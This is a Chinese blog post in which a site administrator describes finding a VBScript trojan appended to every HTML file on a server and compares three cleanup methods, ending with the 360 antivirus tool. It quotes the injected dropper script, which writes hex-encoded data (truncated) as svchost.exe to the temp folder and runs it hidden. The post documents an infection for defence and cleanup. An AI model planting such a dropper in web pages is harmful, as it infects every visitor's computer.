今天下午在转移服务器的时候,发现模板文件夹里的HTML文件全部均在大小112K至120K大小不等,深深的引起了我的注意,感觉很奇怪,正常制作的HTML模板文件大小都在5K左右的,怎么一下子这么大?不看不知,一看才发现新大陆!
木马呈现方式
代码效果:在网站里面所有的HTML文件后面,会自动添加一段VB代码,只要是HTML,一个不漏!
代码方式:
- <SCRIPT Language=VBScript><!--
- DropFileName = "svchost.exe"
- WriteData = "4D5A90000300000004
- …… …… ……
- F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT>
效果截图:
VBS木马特征:
【内容来源于:https://www.diebaosoft.com/】,未经授权,谢绝转载
清理木马处理的时候提供了三个思路:
思路一、采用NOTEPAD++或UE编辑器,通过设置正式表达式利用文本批量替换此木马
结局:因木马内容太长,而要清理的文件太多,常规的编辑器根本顶不住内存的压力,最终失败告终!
思路二、采用赛门铁克推出的专用查杀工具:赛门铁克Ramnit病毒专杀工具(Symantec Ramnit Removal Tool) 2.4.4.3;
结局:无法设置指定目录的查杀,处理过程周期太长,看不到终点;同时无查杀进展报告,最终放弃;
注:
因为全部是网站文件,我们在寻找解决问题的时候,不能删除目标HTML文件,对于一个互联网网站服务者而言,将面临的不亚于灭顶之灾,所以只能对目标木马进行清理后,并保留修复后的正常原HTML文件
思路三、采用360杀毒;
结局:虽然一直对360不报有好的态度,但在当前此问题上,也着实解决了问题;在使用中,能快速检测C盘异常感染的病休文件,并优先进行查杀;然后通过指定目录的查杀,批量查杀VBS木马;
经过测试,360软件检测出来的HTML感染文件,当扫描结束后,点击立即处理,此时软件并不是直接删除文件,而是清理了其中的VBS木马,并完美保存了原HTML文件,而这才是重点;也正好解决了我们担心的问题;
在这个互联网信息泛滥的环境下,当我们在大量信息里面筛选自己想要的软件及各类信息的时候,还是要尽量选择从目标软件官方去下载对应的软件,尽量不要去下载破解软件,以防电脑及电脑上面的资料遭受无法逆转的损失!!!